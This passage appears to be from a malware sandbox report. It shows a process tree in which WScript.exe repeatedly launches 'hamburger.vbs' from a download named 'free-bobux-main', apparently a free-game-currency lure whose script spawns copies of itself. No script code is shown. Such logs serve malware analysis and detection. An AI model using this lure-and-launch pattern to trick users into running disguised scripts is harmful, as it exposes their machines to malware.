C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10344
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10360
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10392
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10428
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10508
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10520
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10572
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10592
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10684
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10720
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10752
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10796
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10808
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10816
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10852
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10896
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10980
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11020
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11092
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11176
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11252
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:4356
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11340
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11424
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11488
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11540
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11556
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11612
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11628
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11656
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11692
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11712
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11860
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11944
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:11972
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12008
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12068
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12136
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12168
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12232
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12256
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:3812
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12356
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12372
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12388
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12504
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12536
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12612
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12644
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12688
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12724
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12744
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12764
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12920
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13020
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13072
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13148
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13540
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13568
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13644
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13696
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13712
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13828
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13880
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13908
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13940
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13988
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14016
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14044
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14084
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14144
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14268
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14316
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13172
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12500
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:12592
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:6780
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:13368
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5156
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14400
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14496
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14572
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14676
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14740
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14780
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14900
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14932
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:14964
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15088
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15188
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15212
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15240
-
-
